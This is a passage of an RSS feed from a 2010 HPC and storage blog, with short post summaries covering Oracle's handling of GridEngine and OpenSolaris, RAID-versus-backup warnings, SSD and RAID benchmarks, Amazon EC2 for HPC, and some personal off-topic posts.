      <pubDate>Tue, 24 Aug 2010 12:39:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/i-know-lets-fix-an-obvious-software-issue-by-redefining-reality/</guid>
      <description>A little preface. In the late 1800&amp;rsquo;s, Indiana had some legislation to consider. It boiled down to the &amp;ldquo;squaring of a circle&amp;rdquo; which effectively put a value on pi (π) that was not correct. Go read the history, it&amp;rsquo;s actually a little sad. The point of this is that reason eventually won out, and
So what is it that has put a proverbial bee in my proverbial bonnet? A software group wants to effectively change the definition of UTC (a time standard) so as not to cause software to break, rather than, I dunno, fixing the software?</description>
    </item>
    
    <item>
      <title>Updates on {SO}GE aka GridEngine</title>
      <link>https://blog.scalability.org/2010/08/updates-on-soge-aka-gridengine/</link>
      <pubDate>Mon, 23 Aug 2010 15:47:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/updates-on-soge-aka-gridengine/</guid>
      <description>Alrighty &amp;hellip; looks like there is additional information. Sun changed the license in 2009 for a 120 user test period; all Oracle did was change this to 60 days, and firm up some of the rest of the language. There is a debate running on the mailing list; while some are (erroneously) claiming that it&amp;rsquo;s FUD, we see now, in all its glory, the issue of incompatible licenses. SGE/OGE is covered under something called SISSL.</description>
    </item>
    
    <item>
      <title>OT: Tournament weekend in Traverse City Michigan ... weapons, sparring, and kata (with video)</title>
      <link>https://blog.scalability.org/2010/08/ot-tournament-weekend-in-traverse-city-michigan-weapons-sparring-and-kata-with-video/</link>
      <pubDate>Mon, 23 Aug 2010 05:27:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/ot-tournament-weekend-in-traverse-city-michigan-weapons-sparring-and-kata-with-video/</guid>
      <description>I took friday off of work (sort of), and we drove up to Traverse City for the White Tigers tournament. Kudos to them for putting on a nice event. My daughter participated in 2 events, weapons and hand kata, and I did 3 as I also did kumite (sparring). Between the two of us, we brought home 4 trophies &amp;hellip; 1 first (kata), 2 second (sparring and weapons), and 1 third (weapons).</description>
    </item>
    
    <item>
      <title>... and SGE goes 90-day trial license ...</title>
      <link>https://blog.scalability.org/2010/08/and-sge-goes-90-day-trial-license/</link>
      <pubDate>Thu, 19 Aug 2010 15:06:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/and-sge-goes-90-day-trial-license/</guid>
      <description>SGE, aka, Sun Grid Engine, is the latest bit of HPC collateral damage in the Oracle digestion of Sun. This is not to say it&amp;rsquo;s going away; Dan Templeton has a nice post on his site indicating that they have a roadmap and a future. It&amp;rsquo;s just that it is no longer open source. You can&amp;rsquo;t use it for more than 90 days w/o a paid license from Oracle. Whoops. This said, the GE community is stepping up to do something about this, though my concern is that Oracle could lean on them a little.</description>
    </item>
    
    <item>
      <title>A question every business has to ask themselves ...</title>
      <link>https://blog.scalability.org/2010/08/a-question-every-business-has-to-ask-themselves/</link>
      <pubDate>Thu, 19 Aug 2010 03:42:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/a-question-every-business-has-to-ask-themselves/</guid>
      <description>that is, what business are you in? Sounds strange &amp;hellip; doesn&amp;rsquo;t it? This comes up from some recent experience with customers who are paying very late. Thinking this through, I am reminded of one of my favorite local restaurants, with a little aphorism on its wall. It reads
This goes to the fundamental truth about your business and your competencies. We aren&amp;rsquo;t a lender of capital. I think it&amp;rsquo;s time we stopped any pretense at it.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2010-08-18</title>
      <link>https://blog.scalability.org/2010/08/twitter-updates-for-2010-08-18/</link>
      <pubDate>Wed, 18 Aug 2010 11:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/twitter-updates-for-2010-08-18/</guid>
      <description>* We now have customers on 4 continents ... WOOT! [#](http://twitter.com/sijoe/statuses/21434952930)  Powered by Twitter Tools</description>
    </item>
    
    <item>
      <title>Dell takes 3PAR</title>
      <link>https://blog.scalability.org/2010/08/dell-takes-3par/</link>
      <pubDate>Mon, 16 Aug 2010 15:32:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/dell-takes-3par/</guid>
      <description>3PAR isn&amp;rsquo;t technically high performance storage. They are more of a competitor to EMC and HDS. Specifically in the array arena. This arena is a large one, though arrays are losing favor as compared to clustered storage systems (IDCs view, and I think StorageMojo&amp;rsquo;s as well). The article notes the price at $1.15B USD. It suggests Dell is focusing upon the integrated stack worldview, and thinks a switch vendor will be next.</description>
    </item>
    
    <item>
      <title>Did I mention RAID is not backup?</title>
      <link>https://blog.scalability.org/2010/08/did-i-mention-raid-is-not-backup/</link>
      <pubDate>Mon, 16 Aug 2010 15:19:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/did-i-mention-raid-is-not-backup/</guid>
      <description>Another customer, been bugging them about this for a while. Get a backup of your data. Don&amp;rsquo;t presume that RAID means you can&amp;rsquo;t back it up. Then they encounter an issue. So &amp;hellip; work with me on this. What is the cost of making 1 copy for cold storage somewhere? Cost in time and in hardware for storage. Then compare to that, what is the cost of recreating the lost data should something break?</description>
    </item>
    
    <item>
      <title>Yes!</title>
      <link>https://blog.scalability.org/2010/08/yes/</link>
      <pubDate>Sat, 14 Aug 2010 22:13:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/yes/</guid>
      <description>A good article on job creation and innovation at techcrunch. The author makes many points I have made in the past myself. His closing paragraph is dead on.
Yes. Exactly. Please, by all means, read it all.</description>
    </item>
    
    <item>
      <title>#include &#34;opensolaris_eulogy.h&#34;</title>
      <link>https://blog.scalability.org/2010/08/insert-opensolaris_eulogy-h/</link>
      <pubDate>Sat, 14 Aug 2010 00:21:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/insert-opensolaris_eulogy-h/</guid>
      <description>She&amp;rsquo;s dead Jim. OpenSolaris is officially no more. From the memo, I don&amp;rsquo;t expect to see ZFS outside of Solaris any time soon. Which, in light of the development of btrfs and ceph (among others) will matter less and less over time. [update] oh yeah &amp;hellip; in my rush to get this up, I used &amp;ldquo;insert&amp;rdquo; and not &amp;ldquo;include&amp;rdquo;. So a quick  $title =~ s/insert/include/g ; and it makes more sense.</description>
    </item>
    
    <item>
      <title>Shouldn&#39;t we just say no to java already?</title>
      <link>https://blog.scalability.org/2010/08/shouldnt-we-just-say-no-to-java-already/</link>
      <pubDate>Fri, 13 Aug 2010 12:31:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/shouldnt-we-just-say-no-to-java-already/</guid>
      <description>Oracle is now going after Java centric products, specifically starting with Google. Java itself has largely failed as a write once run anywhere platform &amp;hellip; it has always been a (not terribly good) solution in search of a (narrow) problem niche, trying to pretend to be a wide scale solution to all problems everywhere. And in that, it fails, miserably. There are two very painful aspects of web based applications I deal with on a daily basis.</description>
    </item>
    
    <item>
      <title>zOMG like ... nodmraid boot option totally doesnt work ...</title>
      <link>https://blog.scalability.org/2010/08/zomg-like-nodmraid-boot-option-totally-doesnt-work/</link>
      <pubDate>Thu, 12 Aug 2010 17:50:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/zomg-like-nodmraid-boot-option-totally-doesnt-work/</guid>
      <description>[zUPDATE]: zOMG its like &amp;hellip; ya know &amp;hellip; I made a typo and hit the wrong load &amp;hellip;. nodmraid works fine (along with some brokenmodule=&amp;hellip; magic). As Emily Litella would say, never mind.
 This one is (again) causing me to pull some of my rapidly disappearing hair out of my head. We don&amp;rsquo;t do fakeRAID. For many reasons. We have a vanishingly small interest in dm*. We want to turn it off.</description>
    </item>
    
    <item>
      <title>Did distributed memory really win?</title>
      <link>https://blog.scalability.org/2010/08/did-distributed-memory-really-win-2/</link>
      <pubDate>Thu, 12 Aug 2010 04:46:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/did-distributed-memory-really-win-2/</guid>
      <description>If you asked me years ago, I would have said, yes, of course it did. Now I am having second thoughts. Our processors have 4, 6, 8, 12 cores, and soon more like 16 and up. All sharing a set of pipes to RAM. Programming these can be done either with a distributed memory interface like MPI, or a much simpler interface like OpenMP. Vector processors ala GPU, Knights Ferry/Bridge are coming out which are little more than massive numbers of PEs and shared memory.</description>
    </item>
    
    <item>
      <title>Evolution of clouds in HPC</title>
      <link>https://blog.scalability.org/2010/08/evolution-of-clouds-in-hpc/</link>
      <pubDate>Thu, 12 Aug 2010 04:41:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/evolution-of-clouds-in-hpc/</guid>
      <description>I argue that clouds are v3.0 of the original idea, ASP. ASP provided a remote hardware/software environment to run your apps. It didn&amp;rsquo;t have the benefit of virtualization, standard stacks like LAMP, etc. Plus it had high costs to get started. It was destined/doomed to fail. ASP v2.0 came about with &amp;ldquo;grids&amp;rdquo;. They were the buzzword for a while, and sought to provide a &amp;ldquo;utility computing&amp;rdquo; (remember that?) model. Provide a platform, make access easy, and they will come.</description>
    </item>
    
    <item>
      <title>RAID is not a backup, number 987342 in a series ...</title>
      <link>https://blog.scalability.org/2010/08/raid-is-not-a-backup-number-987342-in-a-series/</link>
      <pubDate>Thu, 12 Aug 2010 04:29:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/raid-is-not-a-backup-number-987342-in-a-series/</guid>
      <description>Ok, raise your hand if you are using RAID as a backup. No, seriously. Those with your hands up &amp;hellip; have you ever lost data? Want to? Keep using RAID as a backup. I don&amp;rsquo;t mean disk to disk backup. I mean not using a backup when you have a RAID. The RAID is your backup. What is the cost to replace all the material you have created over time stored on that RAID?</description>
    </item>
    
    <item>
      <title>Ahh ... the joy of business ...</title>
      <link>https://blog.scalability.org/2010/08/ahh-the-joy-of-business/</link>
      <pubDate>Wed, 11 Aug 2010 20:01:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/ahh-the-joy-of-business/</guid>
      <description>I like what we do, we are pretty good at it. Every now and then though, we have some &amp;hellip;er &amp;hellip; more interesting moments. Have a customer now who, for the past several invoices, has required us to engage legal counsel to get them to pay. This is ridiculous &amp;hellip; I&amp;rsquo;ve thought of naming and shaming them, but it&amp;rsquo;s not worth it. Firing them as a customer is what the business books recommend.</description>
    </item>
    
    <item>
      <title>It looks like people are starting to get it ...</title>
      <link>https://blog.scalability.org/2010/08/it-looks-like-people-are-starting-to-get-it/</link>
      <pubDate>Tue, 10 Aug 2010 02:12:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/it-looks-like-people-are-starting-to-get-it/</guid>
      <description>I&amp;rsquo;ve been a strong proponent of real security &amp;hellip; not security theatre &amp;hellip; since I saw what crackers will do to unwitting customers. Most of the exploits I&amp;rsquo;ve seen over the past several years have been due to a very weak point of entry, coupled with some keylogger technology. I&amp;rsquo;ve watched otherwise secure Linux clusters be compromised easily, when a grad student running windows happily typed the root password while sshing in.</description>
    </item>
    
    <item>
      <title>How you can tell the universe is conspiring against you</title>
      <link>https://blog.scalability.org/2010/08/how-you-can-tell-the-universe-is-conspiring-against-you/</link>
      <pubDate>Sat, 07 Aug 2010 12:39:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/how-you-can-tell-the-universe-is-conspiring-against-you/</guid>
      <description>A few weeks ago, I had a meeting in Chicago. Well, I would have had the meeting, had I not had a really bad kidney stone attack that week. Won&amp;rsquo;t get into that, other than to note that it hurt badly, and I wound up in a hospital and ER for ~3.5 days. Released that thursday, I had been scheduled to drive to Chicago that night. Given how saturated I was with pain meds, I didn&amp;rsquo;t think this was the wisest of ideas.</description>
    </item>
    
    <item>
      <title>Oracle/Sun&#39;s HPC goes away ...</title>
      <link>https://blog.scalability.org/2010/08/oraclesuns-hpc-goes-away/</link>
      <pubDate>Fri, 06 Aug 2010 01:31:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/oraclesuns-hpc-goes-away/</guid>
      <description>You knew something like this could happen &amp;hellip; but probably, like most others, you never thought it really would. Unfortunately, it appears to have happened. The technologies in Oracle&amp;rsquo;s HPC quiver include SGE (aka GridEngine), Lustre, and several others. Lustre really doesn&amp;rsquo;t have use cases outside of HPC storage. The SGE product largely doesn&amp;rsquo;t have use cases outside of HPC (though you could use it in some fairly creative ways).
We have customers with business dependencies on SGE.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2010-08-05</title>
      <link>https://blog.scalability.org/2010/08/twitter-updates-for-2010-08-05/</link>
      <pubDate>Thu, 05 Aug 2010 12:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/twitter-updates-for-2010-08-05/</guid>
      <description>* Congrats @[RickForMI](http://twitter.com/RickForMI) on your win. Let us know how we can help! [#](http://twitter.com/sijoe/statuses/20308293872) * @[Obdurodon](http://twitter.com/Obdurodon) seen that a bit with (insert your favorite distribution here). Need to promote the concept that a distro is an instance of linux [in reply to Obdurodon](http://twitter.com/Obdurodon/statuses/20312247237) [#](http://twitter.com/sijoe/statuses/20317313478) * @[herrold](http://twitter.com/herrold) Have seen lots of folks thinking that our time/effort/materials were free because the software was. [in reply to herrold](http://twitter.com/herrold/statuses/20316475702) [#](http://twitter.com/sijoe/statuses/20317379240)  Powered by Twitter Tools</description>
    </item>
    
    <item>
      <title>This day has been exhausting and exhilarating</title>
      <link>https://blog.scalability.org/2010/08/this-day-has-been-exhausting-and-exhilarating/</link>
      <pubDate>Wed, 04 Aug 2010 21:30:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/this-day-has-been-exhausting-and-exhilarating/</guid>
      <description>I can&amp;rsquo;t say why just yet. Let&amp;rsquo;s see if anything comes of it; I certainly hope so. Spent &amp;hellip; I dunno &amp;hellip; most of the day &amp;hellip; in meetings or on the phone. Good stuff is a-brewing. Good stuff.</description>
    </item>
    
    <item>
      <title>OT: Michigan has a computer guy running for governor</title>
      <link>https://blog.scalability.org/2010/08/ot-michigan-has-a-computer-guy-running-for-governer/</link>
      <pubDate>Wed, 04 Aug 2010 01:58:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/ot-michigan-has-a-computer-guy-running-for-governer/</guid>
      <description>&amp;hellip; and it looks like he just won his primary. I am not normally one for discussing much politics here, and I&amp;rsquo;ll keep that to a minimum. Rick Snyder is a former Gateway exec, and has been a VC in the Ann Arbor area. I&amp;rsquo;ve never met him personally, but have heard nothing but good things from people who have met him. Our daughters attended the same school, and will again next school year.</description>
    </item>
    
    <item>
      <title>Interesting SSD results with a late model kernel</title>
      <link>https://blog.scalability.org/2010/08/interesting-ssd-results-with-a-late-model-kernel/</link>
      <pubDate>Mon, 02 Aug 2010 19:57:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/interesting-ssd-results-with-a-late-model-kernel/</guid>
      <description>Basic MD raid0, xfs file system, two Intel SSDs (X25-E). There are quite a few benchmarketing numbers out there, and no, I won&amp;rsquo;t regurgitate them. Or believe them, for that matter. Just built a testing kernel out of 2.6.35, installed it on a test machine, and I wanted to see the impact on random reads/writes of a few of the changes to xfs and others. From our (otherwise excellent) 2.</description>
    </item>
    
    <item>
      <title>As of 1-August-2010 ... two important milestones have been reached</title>
      <link>https://blog.scalability.org/2010/07/as-of-1-august-2010-two-important-milestones-have-been-reached/</link>
      <pubDate>Sat, 31 Jul 2010 02:06:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/as-of-1-august-2010-two-important-milestones-have-been-reached/</guid>
      <description>First, and most important &amp;hellip; my 19th wedding anniversary. Woot! I&amp;rsquo;m a lucky guy, and I know it! Second, and very important for the day job front, we&amp;rsquo;ve been in business 8 years &amp;hellip; self bootstrapped, profitable, and growing. This is not to say we don&amp;rsquo;t need capital, but we are a business first, and making a loss is not something we can sustain for very long, as we fund our operations from our cash flow.</description>
    </item>
    
    <item>
      <title>Almost, but not quite ...</title>
      <link>https://blog.scalability.org/2010/07/almost-but-not-quite-2/</link>
      <pubDate>Sat, 31 Jul 2010 01:49:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/almost-but-not-quite-2/</guid>
      <description>Matt Asay has an interesting article at The Register. In it, he argues that Microsoft needs to adapt to the world that has evolved around it, and do something drastic. This article references a Wall Street Journal article/post on the state of Microsoft and the lack of motion of its share price over the last decade. In the quoted WSJ article, Matt points to a paragraph that I&amp;rsquo;ll repeat here:</description>
    </item>
    
    <item>
      <title>mpiBLAST test RPMs for 1.6.0 available</title>
      <link>https://blog.scalability.org/2010/07/mpiblast-test-rpms-for-1-6-0-available/</link>
      <pubDate>Sat, 31 Jul 2010 01:03:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/mpiblast-test-rpms-for-1-6-0-available/</guid>
      <description>See here. These are in testing, so please report any bugs/errors. mpiBLAST is, of course, one of the original cluster-accelerated BLAST implementations, being developed by Wu Feng&amp;rsquo;s group at VT. IMO there is a strong need for applications like this, as well as mpihmmer and others. As data set sizes continue to grow at an exponential pace, we need tools that can scale to the need. mpiBLAST is definitely in this set of tools &amp;hellip; being an enabling technology to perform analyses at scale that might not be possible without it.</description>
    </item>
    
    <item>
      <title>A view of Bluearc ... and to a degree, a fair number of storage companies</title>
      <link>https://blog.scalability.org/2010/07/a-view-of-bluearc-and-to-a-degree-a-fair-number-of-storage-companies/</link>
      <pubDate>Sat, 31 Jul 2010 00:54:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/a-view-of-bluearc-and-to-a-degree-a-fair-number-of-storage-companies/</guid>
      <description>At The Register, Chris Mellor has an interesting article on Bluearc. In it he notes that they just raised a new series of capital
Seven rounds. Total capital input is $225M USD. For a VC to be really interested, they need to see some serious multiplicative effects of this investment. Assume that they can exit at 10x valuation &amp;hellip; assume that for $20M they sold 50-ish percent of the company. VCs typically want in the 33-50% region, and the money is expensive.</description>
    </item>
    
    <item>
      <title>Unifying the JackRabbit and DeltaV baseline loads</title>
      <link>https://blog.scalability.org/2010/07/unifying-the-jackrabbit-and-deltav-baseline-loads/</link>
      <pubDate>Tue, 27 Jul 2010 04:48:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/unifying-the-jackrabbit-and-deltav-baseline-loads/</guid>
      <description>For a while, we&amp;rsquo;ve used Ubuntu 8.04 as the baseline distribution for DeltaV. In the earlier days, it was easier to get some aspects of the load working, as we had a modern kernel and userspace to work from. Ubuntu 10.04 has come out, and I am not sure I like it as much. It has some good features, but Canonical has been pushing Ubuntu into some not so great directions as of late, IMO.</description>
    </item>
    
    <item>
      <title>The day job laptop</title>
      <link>https://blog.scalability.org/2010/07/the-day-job-laptop/</link>
      <pubDate>Mon, 26 Jul 2010 20:09:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/the-day-job-laptop/</guid>
      <description>&amp;hellip; died. Display randomly quits. Just weeks after the warranty expired. Ugh. Specs for the new one: 8+ GB RAM, quad core Intel, Nvidia graphics. So far, Dell has a 4500 workstation that looks good, and HP has a multimedia laptop that looks good. Anyone else I should look at? Need to run Linux and Windows 7. Mostly Linux. 64 bit. Long battery life (3+ hours) would be nice; this is what I have today.</description>
    </item>
    
    <item>
      <title>... and another Solaris OEM agreement bites the dust ...</title>
      <link>https://blog.scalability.org/2010/07/and-another-solaris-oem-agreement-bites-the-dust/</link>
      <pubDate>Mon, 26 Jul 2010 17:59:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/and-another-solaris-oem-agreement-bites-the-dust/</guid>
      <description>(with apologies to Queen) Looks like Oracle/IBM have parted ways on Solaris. None of this bodes well for Solaris market share. If Oracle wants a private OS to run for Oracle&amp;rsquo;s apps, to compel people to buy its hardware/OS to run, then, well, it might pursue a strategy like this. Or maybe IBM demanded onerous terms. Or &amp;hellip; Ok, we don&amp;rsquo;t know. But that agreement is coming to an end. Which suggests that Oracle isn&amp;rsquo;t interested in saving it.</description>
    </item>
    
    <item>
      <title>So what do we do when our software RAID is faster than their hardware RAID?</title>
      <link>https://blog.scalability.org/2010/07/so-what-do-we-do-when-our-software-raid-is-faster-than-their-hardware-raid/</link>
      <pubDate>Mon, 26 Jul 2010 13:56:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/so-what-do-we-do-when-our-software-raid-is-faster-than-their-hardware-raid/</guid>
      <description>Results from our baseline tests of our Delta-V unit are showing a sustained write speed north of 850 MB/s, and a sustained read speed north of 1 GB/s. I compare these numbers to some of our competitors&amp;rsquo; systems, and note that these are a bit higher than what we have seen reported from them in realistic configurations. These systems are slated to be iSCSI targets for the customer who bought them.</description>
    </item>
    
    <item>
      <title>DV4 tuned ...</title>
      <link>https://blog.scalability.org/2010/07/dv4-tuned/</link>
      <pubDate>Mon, 26 Jul 2010 03:19:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/dv4-tuned/</guid>
      <description>Spent the weekend working on our DeltaV 4 unit, tuning it a bit. Previous write numbers were a bit lower than I liked, so we adjusted some of the configuration a little. This is what resulted (old write numbers were in the 450MB/s region for this test):
Run status group 0 (all jobs): WRITE: io=31,748MB, aggrb=788MB/s, minb=807MB/s, maxb=807MB/s, mint=40264msec, maxt=40264msec
This is way outside system cache. It&amp;rsquo;s also faster than many of the hardware RAID vendors&amp;rsquo; machines in this size class, and far more cost effective.</description>
    </item>
    
    <item>
      <title>In a world of vector and intrinsically parallel machines ...</title>
      <link>https://blog.scalability.org/2010/07/in-a-world-of-vector-and-intrinsically-parallel-machines/</link>
      <pubDate>Sun, 25 Jul 2010 16:40:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/in-a-world-of-vector-and-intrinsically-parallel-machines/</guid>
      <description>&amp;hellip; why are we still programming them with serial languages? And more to the point, why are these language compilers so terrible at converting serial code to parallel code? No, seriously &amp;hellip; I know there are several constraints on the semantics of the serial language code processing. Debugging and exceptions for one &amp;hellip; you wouldn&amp;rsquo;t want to signal a floating point exception in code that had nothing to do with the FPE in the first place.</description>
    </item>
    
    <item>
      <title>Conservative?  Me?  Nah ...</title>
      <link>https://blog.scalability.org/2010/07/conservative-me-nah/</link>
      <pubDate>Sun, 25 Jul 2010 05:46:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/conservative-me-nah/</guid>
      <description>Ok, well, maybe. This is about text editors, not political affiliations by the way. I&amp;rsquo;ve been using nedit for a while. I had just switched to it when I started working on my thesis &amp;hellip; er &amp;hellip; a while ago. It was nice, as the same editor worked nicely on Irix and OS/2. My thesis was written in TeX (and yes, it was assembled with a Makefile), nedit was a great editor for this &amp;hellip; It was a terrific editor for Fortran programming, and not bad for C, Perl, C++, &amp;hellip; But &amp;hellip; as with all things &amp;hellip; it is showing its age.</description>
    </item>
    
    <item>
      <title>OT: The joy that are kidney stones</title>
      <link>https://blog.scalability.org/2010/07/ot-the-joy-that-are-kidney-stones/</link>
      <pubDate>Fri, 23 Jul 2010 09:30:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/ot-the-joy-that-are-kidney-stones/</guid>
      <description>No &amp;hellip; seriously &amp;hellip; not. I spent 2.5 of the last 4 days in hospital, and yesterday had to go to the ER to deal with complications and some fairly incredible amounts of pain. I had to postpone phone calls, a trip to Chicago, etc. Not happy about this. And in the course of this, I learned I had yet another stone on the right. Let me reiterate: Toradol is your friend if you are in this way.</description>
    </item>
    
    <item>
      <title>On the test track with a new Delta-V</title>
      <link>https://blog.scalability.org/2010/07/on-the-test-track-with-a-new-delta-v/</link>
      <pubDate>Fri, 23 Jul 2010 08:44:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/on-the-test-track-with-a-new-delta-v/</guid>
      <description>At the day job, we have another to finish building today, and then build the RAID. This is the 3rd unit of the new generation of Delta-V&amp;rsquo;s, and they are generally showing better overall performance than the older versions. Delta-V&amp;rsquo;s are cost optimized storage platforms, suitable for block and file storage targets, as well as very cost effective cluster storage platforms. You do need good performance on your storage devices &amp;hellip; especially as the size of storage grows.</description>
    </item>
    
    <item>
      <title>OT: round four of kidney stones</title>
      <link>https://blog.scalability.org/2010/07/ot-round-four-of-kidney-stones/</link>
      <pubDate>Tue, 20 Jul 2010 14:45:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/ot-round-four-of-kidney-stones/</guid>
      <description>I&amp;rsquo;d like to file a bug report on my biochemistry &amp;hellip; There is something not quite right about getting another stone so quickly. Well, at least I know what happens next. If you are ever in this situation yourself, remember: Toradol is your friend. Hopefully this one will go easier than the previous.</description>
    </item>
    
    <item>
      <title>Thoughts on SSDs, spinning rust, ...</title>
      <link>https://blog.scalability.org/2010/07/thoughts-on-ssds-spinning-rust/</link>
      <pubDate>Mon, 19 Jul 2010 14:39:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/thoughts-on-ssds-spinning-rust/</guid>
      <description>So SSDs are upon us with a vengeance. No one is actively predicting the death of spinning rust &amp;hellip; yet. But it&amp;rsquo;s in the back of many folks&amp;rsquo; minds, even if they aren&amp;rsquo;t saying it now. Similar to the death of tape. Yeah, I know, it&amp;rsquo;s still around. Call that the long tail. Sequential storage mechanisms are going the way of the dodo bird. The issues everyone worries about are cost per data volume, and speed of access/recovery, not to mention longevity.</description>
    </item>
    
    <item>
      <title>OT: The day job documentation site is up, with content being added</title>
      <link>https://blog.scalability.org/2010/07/ot-the-day-job-documentation-site-is-up-with-content-being-added/</link>
      <pubDate>Fri, 16 Jul 2010 16:21:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/ot-the-day-job-documentation-site-is-up-with-content-being-added/</guid>
      <description>There is a back story on this. Basically, writing documentation takes a while, and when it changes, you have to update many things. I personally find this task painful &amp;hellip; in the sense that it&amp;rsquo;s hard to make small changes the way most documentation works. In addition, for years, we&amp;rsquo;ve been wanting to go &amp;ldquo;all electronic&amp;rdquo;. Paper and printed documentation gets lost or destroyed, you have to regenerate it &amp;hellip; and oh, as noted above, it&amp;rsquo;s hard to make small changes.</description>
    </item>
    
    <item>
      <title>... and projects have to figure out their future ...</title>
      <link>https://blog.scalability.org/2010/07/and-projects-have-to-figure-out-their-future/</link>
      <pubDate>Tue, 13 Jul 2010 19:46:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/and-projects-have-to-figure-out-their-future/</guid>
      <description>The future of OpenSolaris is very much in doubt. There is a shelf life on this product; it expires 16-August-2010, unless Oracle decides to communicate actively with the project. I had suggested previously that OpenSolaris is likely under serious review by Oracle. What possible business model could they have for OpenSolaris to be accretive to Oracle&amp;rsquo;s bottom line, when they give it away, and others get support revenue from it? Well, there are several possible, but they involve some changes to licensing and support models.</description>
    </item>
    
    <item>
      <title>As the market changes ...</title>
      <link>https://blog.scalability.org/2010/07/as-the-market-changes-2/</link>
      <pubDate>Tue, 13 Jul 2010 19:24:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/as-the-market-changes-2/</guid>
      <description>As noted in the previous post, the EC2 CC1 bit is likely to be game changing for commercial users. The market is undergoing one of its transformations, but I am seeing two different, actually complementary trends occurring at the same time. When these changes have happened in the past, a process of creative destruction has occurred. That is, something old was destroyed, and in the process, something new flourished. The changes driving this market in the past have been the cost per computing cycle, and the up-front purchase/lease costs.</description>
    </item>
    
    <item>
      <title>This could be game changing for lots of users</title>
      <link>https://blog.scalability.org/2010/07/this-could-be-game-changing-for-lots-of-users/</link>
      <pubDate>Tue, 13 Jul 2010 12:30:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/this-could-be-game-changing-for-lots-of-users/</guid>
      <description>Amazon announced EC2 availability for HPC users. As per the article on InsideHPC, previous incarnations of EC2 didn&amp;rsquo;t really work well for low latency jobs or large runs. They still have a storage issue (e.g. storage performance and parallel IO), that we&amp;rsquo;d be happy to help with. Why is this potentially game changing for the market? A number of reasons.
You can exploit a complete pay-as-you-go view for whatever you want to boot up (minus accelerators).</description>
    </item>
    
    <item>
      <title>Ok ... this one makes you think ... did they really want to do that?</title>
      <link>https://blog.scalability.org/2010/07/ok-this-one-makes-you-think-did-they-really-want-to-do-that/</link>
      <pubDate>Thu, 08 Jul 2010 13:15:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/ok-this-one-makes-you-think-did-they-really-want-to-do-that/</guid>
      <description>The US Cyber command, a new &amp;hellip; er &amp;hellip; entity in the US that, er &amp;hellip; will protect us &amp;hellip; somehow &amp;hellip; has an interesting seal. On that seal is a &amp;ldquo;cipher&amp;rdquo; of some sort. Well that &amp;ldquo;cipher&amp;rdquo;, 9ec4c12949a4f31474f299058ce2b22a appears around the inner ring of the seal. Wired noticed this and had a contest to de-cipher it. The Register noticed this, and, as all deep techies might say, ya know, it looks a heckuva lot like an md5 hash of something.</description>
    </item>
    
    <item>
      <title>Using ZFS in your storage considered harmful ... without a license from NetApp ...</title>
      <link>https://blog.scalability.org/2010/07/using-zfs-in-your-storage-considered-harmful-without-a-license-from-netapp/</link>
      <pubDate>Wed, 07 Jul 2010 12:08:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/using-zfs-in-your-storage-considered-harmful-without-a-license-from-netapp/</guid>
      <description>Chalk this up to &amp;ldquo;you knew this would happen&amp;rdquo;. NetApp is going after ZFS storage vendors, folks who use ZFS in their products, as infringing upon NetApp patents. Yes Virginia, this includes open source vendors.
Anyone wanna take bets as to whether or not the license fees will be &amp;ldquo;set low&amp;rdquo;? I have my doubts. ZFS directly impacts NetApp&amp;rsquo;s business model. It is unlikely that they will use RAND pricing. Well &amp;hellip; their version of &amp;ldquo;reasonable&amp;rdquo; may not mean the same thing as others&amp;rsquo; version of &amp;ldquo;reasonable&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>approaching 1% penetration into top 500</title>
      <link>https://blog.scalability.org/2010/07/approaching-1-penetration-into-top-500/</link>
      <pubDate>Wed, 07 Jul 2010 07:09:06 +0000</pubDate>
      
